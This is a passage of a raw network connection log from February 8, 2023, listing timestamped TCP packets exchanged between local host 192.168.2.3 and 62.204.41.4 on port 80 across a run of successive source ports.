                                                                    Feb 8, 2023 21:33:21.482039928 CET805012062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.485718012 CET805012062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.485836983 CET5012080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.590204954 CET5012080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.592180967 CET5012180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.652555943 CET805012062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.652750969 CET5012080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.653846979 CET805012162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.653991938 CET5012180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.657461882 CET5012180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.719151020 CET805012162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.722080946 CET805012162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.722256899 CET5012180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.825053930 CET5012180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.826711893 CET5012280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.886904955 CET805012162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.887033939 CET5012180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.888992071 CET805012262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.889220953 CET5012280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.889662981 CET5012280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:21.951914072 CET805012262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.954339027 CET805012262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:21.954479933 CET5012280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.068260908 CET5012280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.072870970 CET5012380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.130948067 CET805012262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.131056070 CET5012280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.133305073 CET805012362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.133395910 CET5012380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.133749962 CET5012380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.194152117 CET805012362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.198437929 CET805012362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.198606014 CET5012380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.378588915 CET5012380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.379343033 CET5012480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.439312935 CET805012362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.439423084 CET5012380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.441874027 CET805012462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.441997051 CET5012480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.455838919 CET5012480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.518685102 CET805012462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.522018909 CET805012462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.522102118 CET5012480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.637943983 CET5012480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.638930082 CET5012580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.700421095 CET805012462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.700465918 CET805012562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.700527906 CET5012480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.700608015 CET5012580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.703938961 CET5012580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.765638113 CET805012562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.768277884 CET805012562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.768575907 CET5012580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.875545979 CET5012580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.876482964 CET5012680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.968112946 CET805012662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.969353914 CET5012680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.969623089 CET805012562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:22.970000029 CET5012580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:22.981983900 CET5012680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.042649984 CET805012662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.047378063 CET805012662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.047519922 CET5012680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.154882908 CET5012680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.156080961 CET5012780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.215658903 CET805012662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.216337919 CET805012762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.216521978 CET5012780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.216882944 CET5012680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.222781897 CET5012780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.283430099 CET805012762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.285810947 CET805012762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.286190033 CET5012780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.403706074 CET5012780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.408005953 CET5012880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.464822054 CET805012762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.464966059 CET5012780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.469424009 CET805012862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.469727039 CET5012880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.470232964 CET5012880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.531419039 CET805012862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.533766031 CET805012862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.533976078 CET5012880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.653707981 CET5012880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.654625893 CET5012980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.715131998 CET805012862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.715172052 CET805012962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.715369940 CET5012880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.715419054 CET5012980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.715965033 CET5012980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.776325941 CET805012962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.778614998 CET805012962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.778812885 CET5012980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.887593985 CET5012980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.889864922 CET5013080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.948231936 CET805012962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.948457003 CET5012980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.952410936 CET805013062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:23.952605009 CET5013080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:23.953140974 CET5013080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.018516064 CET805013062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.018573999 CET805013062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.018734932 CET5013080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.123513937 CET5013080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.124644041 CET5013180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.186594009 CET805013062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.186840057 CET5013080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.187364101 CET805013162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.187517881 CET5013180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.191823006 CET5013180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.253334045 CET805013162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.256805897 CET805013162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.256973028 CET5013180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.374413013 CET5013180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.375482082 CET5013280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.436085939 CET805013162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.436134100 CET805013262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.436288118 CET5013180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.436398983 CET5013280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.436847925 CET5013280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.497467995 CET805013262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.499838114 CET805013262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.499994993 CET5013280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.606611013 CET5013280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.607594013 CET5013380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.668015003 CET805013262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.668224096 CET5013280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.670639038 CET805013362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.670902014 CET5013380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.671407938 CET5013380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.733553886 CET805013362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.736025095 CET805013362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.736198902 CET5013380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.845423937 CET5013380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.846084118 CET5013480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.906677961 CET805013462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.906929970 CET5013480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.907486916 CET5013480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.907701969 CET805013362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.907809973 CET5013380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:24.968008041 CET805013462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.970339060 CET805013462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:24.970514059 CET5013480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.074582100 CET5013480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.075500011 CET5013580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.134869099 CET805013562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.135085106 CET5013580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.135107040 CET805013462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.135176897 CET5013480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.140151024 CET5013580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.199847937 CET805013562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.203968048 CET805013562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.204118013 CET5013580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.310977936 CET5013580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.314805984 CET5013680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.370491028 CET805013562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.370654106 CET5013580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.375399113 CET805013662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.375535965 CET5013680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.375931978 CET5013680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.436413050 CET805013662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.438723087 CET805013662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.438801050 CET5013680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.546120882 CET5013680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.547128916 CET5013780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.606791973 CET805013662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.606861115 CET5013680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.607527018 CET805013762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.607614994 CET5013780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.608006001 CET5013780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.668391943 CET805013762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.671648026 CET805013762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.671870947 CET5013780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.781680107 CET5013780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.782741070 CET5013880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.842215061 CET805013762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.842370033 CET5013780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.845202923 CET805013862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.845377922 CET5013880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.846129894 CET5013880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:25.909145117 CET805013862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.911890030 CET805013862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:25.915082932 CET5013880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.035655975 CET5013880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.036597967 CET5013980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.097508907 CET805013962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.097990990 CET5013980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.098195076 CET805013862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.098263025 CET5013880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.098524094 CET5013980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.159331083 CET805013962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.163223028 CET805013962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.166683912 CET5013980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.278136015 CET5013980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.278922081 CET5014080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.339029074 CET805013962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.339595079 CET805014062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.339760065 CET5013980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.339803934 CET5014080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.342715025 CET5014080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.403352976 CET805014062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.406277895 CET805014062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.406466961 CET5014080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.515409946 CET5014080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.516169071 CET5014180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.576178074 CET805014062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.576440096 CET805014162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.576575041 CET5014080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.576617002 CET5014180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.577111006 CET5014180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.637377977 CET805014162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.640788078 CET805014162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.641566038 CET5014180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.748114109 CET5014180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.749134064 CET5014280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.808588982 CET805014162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.808748007 CET5014180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.810811043 CET805014262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.810983896 CET5014280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.815454960 CET5014280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.877361059 CET805014262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.880913019 CET805014262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:26.881134033 CET5014280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.998471022 CET5014280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:26.999672890 CET5014380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.061636925 CET805014262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.061784983 CET5014280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.062460899 CET805014362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.062588930 CET5014380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.062953949 CET5014380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.125967026 CET805014362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.128356934 CET805014362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.128536940 CET5014380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.232276917 CET5014380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.233052969 CET5014480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.294090033 CET805014362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.294193029 CET5014380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.295474052 CET805014462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.295617104 CET5014480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.296113014 CET5014480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.358642101 CET805014462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.361238003 CET805014462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.361716032 CET5014480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.465332031 CET5014480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.466814041 CET5014580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.528191090 CET805014562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.528230906 CET805014462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.528475046 CET5014480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.528552055 CET5014580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.528968096 CET5014580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.589664936 CET805014562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.592056990 CET805014562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.592283964 CET5014580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.700953007 CET5014580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.701880932 CET5014680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.763128042 CET805014562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.763295889 CET5014580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.766716003 CET805014662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.766905069 CET5014680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.767390013 CET5014680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.830801010 CET805014662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.834901094 CET805014662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:27.835100889 CET5014680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.951138973 CET5014680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:27.952367067 CET5014780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.014755011 CET805014662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.014786959 CET805014762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.014854908 CET5014680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.014995098 CET5014780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.016338110 CET5014780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.078902006 CET805014762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.082880974 CET805014762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.083086967 CET5014780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.201390982 CET5014780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.202327967 CET5014880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.265070915 CET805014762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.265131950 CET805014862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.265307903 CET5014780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.265373945 CET5014880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.265922070 CET5014880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.329159975 CET805014862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.330866098 CET805014862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.330964088 CET5014880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.450181007 CET5014880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.450970888 CET5014980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.512727022 CET805014962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.512764931 CET805014862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.512841940 CET5014980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.512865067 CET5014880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.513257980 CET5014980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.574850082 CET805014962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.578936100 CET805014962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.579016924 CET5014980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.687866926 CET5014980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.688673019 CET5015080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.748085976 CET805015062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.748725891 CET5015080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.749109983 CET5015080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.749193907 CET805014962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.749258041 CET5014980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.808362961 CET805015062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.811218977 CET805015062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.813296080 CET5015080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.919095993 CET5015080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.920186996 CET5015180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.978771925 CET805015062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.978885889 CET5015080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.981091976 CET805015162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:28.984808922 CET5015180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:28.985342026 CET5015180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.045965910 CET805015162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.049519062 CET805015162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.050776005 CET5015180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.154953957 CET5015180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.155654907 CET5015280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.215687037 CET805015162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.215785027 CET5015180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.215905905 CET805015262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.218776941 CET5015280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.219203949 CET5015280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.279443979 CET805015262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.281686068 CET805015262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.281759024 CET5015280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.388056993 CET5015280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.388798952 CET5015380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.448555946 CET805015262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.448823929 CET5015280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.449420929 CET805015362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.449852943 CET5015380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.450735092 CET5015380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.511495113 CET805015362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.513860941 CET805015362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.514832973 CET5015380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.622742891 CET5015380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.624048948 CET5015480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.683695078 CET805015362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.684483051 CET805015462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:29.684669018 CET5015380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.684921026 CET5015480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:29.685349941 CET5015480192.168.2.362.204.41.4
